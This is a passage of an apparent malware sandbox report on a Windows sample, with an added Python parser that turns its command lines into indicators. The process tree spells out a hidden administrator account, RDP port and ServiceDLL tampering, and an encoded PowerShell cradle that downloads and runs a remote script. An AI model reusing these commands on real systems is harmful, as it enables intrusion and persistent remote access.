            cmd: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD

[1] C:\Windows\System32\cmd.exe
    cmd: cmd /C net.exe LOCALGROUP "Administrators" updwin /ADD
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\system32\net.exe
        cmd: net.exe LOCALGROUP "Administrators" updwin /ADD
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe
            cmd: C:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD

[1] C:\Windows\System32\cmd.exe
    cmd: cmd /C net.exe user updwin aG4xSuFP
    - Suspicious use of WriteProcessMemory
    note: net user NAME PASSWORD with no switch sets the account password.
    [2] C:\Windows\system32\net.exe
        cmd: net.exe user updwin aG4xSuFP
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe
            cmd: C:\Windows\system32\net1 user updwin aG4xSuFP

[1] C:\Windows\System32\cmd.exe
    cmd: cmd.exe /C wmic path win32_VideoController get name
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\System32\Wbem\WMIC.exe
        cmd: wmic path win32_VideoController get name

[1] C:\Windows\System32\cmd.exe
    cmd: cmd.exe /C wmic CPU get NAME
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\System32\Wbem\WMIC.exe
        cmd: wmic CPU get NAME

[1] C:\Windows\System32\cmd.exe
    cmd: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\system32\cmd.exe
        cmd: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
            note: the -enc argument is base64 of UTF-16LE text and decodes to IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1"), the URL reported under Malware Config.
            - Blacklisted process makes network request
            - Drops file in Program Files directory
            - Drops file in Windows directory
            - Modifies data under HKEY_USERS
            - Suspicious behavior: EnumeratesProcesses
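The command lines in the tree above carry the sample's whole configuration: the new RDP port, the replacement ServiceDLL, the policy it flips, the account and group changes, and the base64 download cradle. The script below is an added example, not part of the sandbox output; it parses those command lines (copied from the tree) into structured values so they can be compared against the Malware Config entry and reused as indicators. The `-enc` decoding relies on the documented fact that PowerShell's -EncodedCommand takes base64 of UTF-16LE text; the function names and the summary layout are this example's own.

```python
"""Recover the configuration pushed by this report's command lines (added example, not sandbox output)."""
import base64
import json
import re
from typing import Dict, List, Optional, Tuple

# Command lines copied from the process tree above.
REPORT_CMDLINES: List[str] = [
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f',
    r'"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f',
    r'"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f',
    r'"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add',
    r"net.exe user updwin Ghasar4f5 /del",
    r"net.exe user updwin aG4xSuFP /add",
    r'net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD',
    r'net.exe LOCALGROUP "Administrators" updwin /ADD',
    r"net.exe user updwin aG4xSuFP",
    r"powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA",
]


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping "quoted strings" whole (quotes stripped)."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', cmdline)]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """PowerShell -EncodedCommand (any unambiguous prefix: -e, -ec, -enc, ...) is base64 of UTF-16LE."""
    toks = tokenize(cmdline)
    for i, tok in enumerate(toks[:-1]):
        low = tok.lower()
        if low.startswith("-e") and "-encodedcommand".startswith(low):
            try:
                return base64.b64decode(toks[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def parse_reg_add(cmdline: str) -> Optional[Dict[str, object]]:
    """reg.exe ADD <key> /v <name> /t <type> /d <data>; REG_DWORD data is converted to int."""
    toks = tokenize(cmdline)
    if len(toks) < 3 or not toks[0].lower().endswith("reg.exe") or toks[1].lower() != "add":
        return None
    out: Dict[str, object] = {"key": toks[2], "name": None, "type": None, "data": None}
    for i in range(3, len(toks) - 1):
        flag = toks[i].lower()
        if flag == "/v":
            out["name"] = toks[i + 1]
        elif flag == "/t":
            out["type"] = toks[i + 1].upper()
        elif flag == "/d":
            out["data"] = toks[i + 1]
    if out["type"] == "REG_DWORD" and out["data"] is not None:
        out["data"] = int(str(out["data"]), 0)  # reg.exe accepts 0x-prefixed or decimal
    return out


def parse_net(cmdline: str) -> Optional[Tuple[str, str, Optional[str]]]:
    """net(1).exe account and group changes -> (action, target, secondary)."""
    toks = tokenize(cmdline)
    if len(toks) < 3:
        return None
    exe = toks[0].lower().rsplit("\\", 1)[-1]
    if exe not in ("net", "net.exe", "net1", "net1.exe"):
        return None
    verb = toks[1].lower()
    flags = {t.lower() for t in toks[2:] if t.startswith("/")}
    args = [t for t in toks[2:] if not t.startswith("/")]
    if verb == "user" and args:
        if "/add" in flags:
            return ("user_add", args[0], args[1] if len(args) > 1 else None)
        if "/del" in flags or "/delete" in flags:
            return ("user_delete", args[0], None)
        if len(args) >= 2:
            return ("user_set_password", args[0], args[1])
    if verb == "localgroup" and len(args) >= 2 and "/add" in flags:
        return ("localgroup_add", args[0], args[1])
    return None


def summarize(cmdlines: List[str]) -> Dict[str, object]:
    """Fold the command lines into the host changes they produce."""
    s: Dict[str, object] = {"rdp_port": None, "termservice_dll": None, "policy": {},
                            "accounts": [], "group_adds": [], "decoded_powershell": [], "urls": []}
    for cmd in cmdlines:
        reg = parse_reg_add(cmd)
        if reg:
            name, key = str(reg["name"] or "").lower(), str(reg["key"]).lower()
            if name == "portnumber" and "rdp-tcp" in key:
                s["rdp_port"] = reg["data"]
            elif name == "servicedll" and "termservice" in key:
                s["termservice_dll"] = reg["data"]
            else:
                s["policy"][reg["name"]] = reg["data"]  # type: ignore[index]
            continue
        change = parse_net(cmd)
        if change:
            bucket = "accounts" if change[0].startswith("user") else "group_adds"
            s[bucket].append(change)  # type: ignore[attr-defined]
            continue
        decoded = decode_encoded_command(cmd)
        if decoded:
            s["decoded_powershell"].append(decoded)  # type: ignore[attr-defined]
            s["urls"].extend(re.findall(r"https?://[^\s\"')]+", decoded))  # type: ignore[attr-defined]
    return s


if __name__ == "__main__":
    print(json.dumps(summarize(REPORT_CMDLINES), indent=2))
```

The decoded cradle reproduces the URL under Malware Config exactly, which is the check to make before trusting an extracted config: the sandbox's extraction and the process tree should agree. The port comes out as 7201, and the ServiceDLL path keeps its .png extension, so both values can go straight into the host check under "Modifies service".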
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Local\Temp\RES72E4.tmp
- MD5: 1fdcac54833b011555c43094a1763d21
- SHA1: 7fb9f16f77494526834a661676df5f9cefc34491
- SHA256: f55f5e5849b63b8f96aac934a51b656348a3f988ff7092e516d8cd6b3be2171c
- SHA512: df85222ec6c2ed4751f312f4b79e751ab2cffef626c9782cc04833d81cee5dfb1ed4ae127e68ca83fc7d74b7bea3e18131469fac012a65823432ee8114f998cf

C:\Users\Admin\AppData\Local\Temp\exvorycj\exvorycj.dll
- MD5: ebcf3dd3fb890e09d5aaf53f5d2cd059
- SHA1: c7fd9283e74d7d404db99271b5561fd11e48661b
- SHA256: 3eb996aaf7f0200b46a2f8dfdcb313bceec55b1f1d36eae356ebc754fee8ce23
- SHA512: 11c326e4b57f4a4cb618944c47cb5aa89eccb5402bb56e50564ec94a26316678cbfa0f61c7330a79792f6a07d953367fe925590c2b4296d7a3d97c1950fdad1c

C:\Users\Admin\AppData\Local\Temp\get-points.ps1
- MD5: dac6b25db50155c0c78d5bf64fb95fa3
- SHA1: 9e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
- SHA256: 6967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf
- SHA512: 679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868

C:\Users\Admin\AppData\Local\Temp\get-points.zip
- MD5: 7cac19b2868c41555db4b71219217f9b
- SHA1: d6f77db578db3c5c572c3a944d9072ed00560dcb
- SHA256: d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a
- SHA512: 5bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6

\??\c:\Users\Admin\AppData\Local\Temp\exvorycj\CSCA0829ACF0674A82AF57138E0B8E8.TMP
- MD5: 6fb54f8c18a72f011cdb689b07b44ddb
- SHA1: 1b399425401fc3ec157ea86b9c1df1c9ce7463b3
- SHA256: 67d3963e68d13fbbb0b49e29d25dac000c5766e5824a40cd33c3aa00dd4da47b
- SHA512: e89b3aa38d2be25949cb29135e11f7d544a63a1c0bc2816be8501bec62d1524531570b9169bdb1d625691a75b195e797237b76b56f7170001cf18f091c86aed6

\??\c:\Users\Admin\AppData\Local\Temp\exvorycj\exvorycj.0.cs
- MD5: 6f235215132cdebacd0f793fe970d0e3
- SHA1: 2841e44c387ed3b6f293611992f1508fe9b55b89
- SHA256: ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
- SHA512: a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e

\??\c:\Users\Admin\AppData\Local\Temp\exvorycj\exvorycj.cmdline
- MD5: 7c4b1de28998359d8fcf90315baa0822
- SHA1: 13776de0b9e5ef30225aeb3c43f27de4c3f649b2
- SHA256: fa27bf08fbb07555661aa1c8f58a1efa94d3aa66d4c057dba12963d2f9cfb5f0
- SHA512: 8a226984b6f77a1293850742124007f89dcd652fcdc78dc9a567cbd1df24d916b59a81fd29224a9a51e678cd6ae87ac43df935480cb1decbee1c22df691294f8

\Windows\Branding\mediasrv.png
- MD5: eeb448ea2709c57b9ea2e223d0c79396
- SHA1: 38331dd027386151ee37a29a7820570a76427b02
- SHA256: c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272
- SHA512: c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc

\Windows\Branding\mediasvc.png
- MD5: bb873bd05a47f502ee4ed3c4ea749a4f
- SHA1: e55a6bf49a4833fb9e9b123df39dac9bf507f75a
- SHA256: a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a
- SHA512: ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548
Memory dumps
- memory/188-41-0x0000000000000000-mapping.dmp
- memory/196-16-0x0000000000000000-mapping.dmp
- memory/212-48-0x0000000000000000-mapping.dmp
- memory/212-15-0x0000000000000000-mapping.dmp
- memory/420-47-0x0000000000000000-mapping.dmp
- memory/420-49-0x00007FFC33E60000-0x00007FFC3484C000-memory.dmp (9.9MB)
- memory/508-32-0x0000000000000000-mapping.dmp
- memory/580-1-0x00000000018C0000-0x00000000018C1000-memory.dmp (4KB)
- memory/732-17-0x0000000000000000-mapping.dmp
- memory/912-35-0x0000000000000000-mapping.dmp
- memory/1000-25-0x0000000000000000-mapping.dmp
- memory/1020-14-0x0000021619530000-0x0000021619531000-memory.dmp (4KB)
- memory/1020-5-0x00000216342D0000-0x00000216342D1000-memory.dmp (4KB)
- memory/1020-4-0x00000216315D0000-0x00000216315D1000-memory.dmp (4KB)
- memory/1020-3-0x00007FFC33E60000-0x00007FFC3484C000-memory.dmp (9.9MB)
- memory/1020-2-0x0000000000000000-mapping.dmp
- memory/1056-26-0x0000000000000000-mapping.dmp
- memory/1336-37-0x0000000000000000-mapping.dmp
- memory/1492-45-0x0000000000000000-mapping.dmp
- memory/1500-31-0x0000000000000000-mapping.dmp
- memory/1600-30-0x0000000000000000-mapping.dmp
- memory/1704-38-0x0000000000000000-mapping.dmp
- memory/1724-23-0x0000000000000000-mapping.dmp
- memory/2060-27-0x0000000000000000-mapping.dmp
- memory/2212-39-0x0000000000000000-mapping.dmp
- memory/2308-24-0x0000000000000000-mapping.dmp
- memory/2400-10-0x0000000000000000-mapping.dmp
- memory/2400-36-0x0000000000000000-mapping.dmp
- memory/2400-20-0x0000000000000000-mapping.dmp
- memory/2944-43-0x0000000000000000-mapping.dmp
- memory/2944-22-0x0000000000000000-mapping.dmp
- memory/3008-18-0x0000000000000000-mapping.dmp
- memory/3008-46-0x0000000000000000-mapping.dmp
- memory/3024-42-0x0000000000000000-mapping.dmp
- memory/3048-40-0x0000000000000000-mapping.dmp
- memory/3500-33-0x0000000000000000-mapping.dmp
- memory/3584-7-0x0000000000000000-mapping.dmp
- memory/3680-21-0x0000000000000000-mapping.dmp
- memory/3792-34-0x0000000000000000-mapping.dmp
- memory/4012-19-0x0000000000000000-mapping.dmp